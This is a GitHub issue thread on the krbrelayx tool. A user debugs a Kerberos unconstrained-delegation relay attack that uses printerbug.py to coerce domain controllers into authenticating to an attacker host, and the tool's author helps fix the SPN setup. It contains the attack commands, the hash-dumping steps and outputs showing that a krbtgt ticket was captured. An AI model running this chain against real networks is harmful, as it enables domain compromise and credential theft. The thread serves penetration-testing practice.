Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Printer bug doesn't work #10

Closed
girlgirlbest opened this issue Dec 23, 2019 · 6 comments
Closed

Printer bug doesn't work #10

girlgirlbest opened this issue Dec 23, 2019 · 6 comments

Comments

@girlgirlbest
Copy link

girlgirlbest commented Dec 23, 2019
edited
Loading

Hello help me please ; I'am read blog;
Use secretsdump,get account machine(computer.test.com) aes256 key & lm:ntlm hashes;
Add dns A record for my attacker machine. For ex. attacker.test.com
python krbrelayx.py -aesKEY "aes256key"
python printerbug.py -hashes lm:ntlm test.com/computer$@primary-dc.test.com attacker.test.com
printerbug output:
[] Attempting to trigger authentication via rprn RPC at primary-dc.test.com
[] Bind OK
[] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[] Triggered RPC backconnect, this may or ma not have worked

krbrelayx output:
Procotol client ldaps loaded..
Procotol client ldap loaded..
Procotol client smb loaded..

SMBD: Received connection from "ip address primary-dc.test.com"
Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'
SMBD: Received connection from "ip address primary-dc.test.com"
Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'
SMBD: Received connection from "ip address primary-dc.test.com"
Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'

Computer.test.com =Windows 7
primary-dc.test.com = Windows 2012 server
attacker.test.com = kali
@dirkjanm
Copy link
Owner

It only authenticates with NTLM, which indicates that there is no SPN set for the cifs/attacker.test.com hostname. You probably skipped the step where you'd need to add an SPN for that host as well.

@girlgirlbest
Copy link
Author

In your blog, wrote need SPN with service HOST/attacker.test.com;
For me now worked with HOST, but i get one more question;
I usage printer bug versus primary-dc.test.com
Krbrelayx output:
Got ticket for primary-dc.test.com [krbtgt@test.com]
But if i'am usage versus secondary-dc.test.com
Krbrelayx output
SMBD: receiver connection from "ip address"
Delegate info not set, cannot extract ticket!
Make sure the account you use has unconstrained delegation rights.

secondary-dc.test.com=Windows 2012 server
primary-dc.test.com = Windows 2012 server
I checked , both dc have unconstrained delegation;

@dirkjanm
Copy link
Owner

I'm not sure what would cause that but for some reason the secondary DC does not think your attacker account has unconstrained delegation.

@girlgirlbest
Copy link
Author

girlgirlbest commented Dec 24, 2019
edited
Loading

Great thanks; Last question )))
If i'am usage printerbug.py versus Windows service 2008 sp2
Output:
[-] SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
Traceback (most recent call last):
File "printerbug.py", line 198, in
main()
File "printerbug.py", line 191, in main
lookup.dump(remote_name)
File "printerbug.py", line 77, in dump
self.lookup(rpctransport, remote_host)
File "printerbug.py", line 87, in lookup
dce.connect()
File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 800, in connect
return self._transport.connect()
File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/transport.py", line 400, in connect
self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 547, in openFile
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

python rcpdump.py test\administrator@"ip address windows 2008 server"
Protocol [MS-RPRN]: Print System Remote Protocol Presense

@dirkjanm
Copy link
Owner

Not quite sure what causes this, could be something 2008 specific but I don't have it here to test.

@dirkjanm dirkjanm closed this as completed Jan 5, 2020
@Cyb3rGh0st786
Copy link

In your blog, wrote need SPN with service HOST/attacker.test.com; For me now worked with HOST, but i get one more question; I usage printer bug versus primary-dc.test.com Krbrelayx output: Got ticket for primary-dc.test.com [krbtgt@test.com] But if i'am usage versus secondary-dc.test.com Krbrelayx output SMBD: receiver connection from "ip address" Delegate info not set, cannot extract ticket! Make sure the account you use has unconstrained delegation rights.

secondary-dc.test.com=Windows 2012 server primary-dc.test.com = Windows 2012 server I checked , both dc have unconstrained delegation;

@girlgirlbest how did it work, I have added both HOST and CIFS but did not work for me . Still getting the below error.
Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@dirkjanm @Cyb3rGh0st786 @girlgirlbest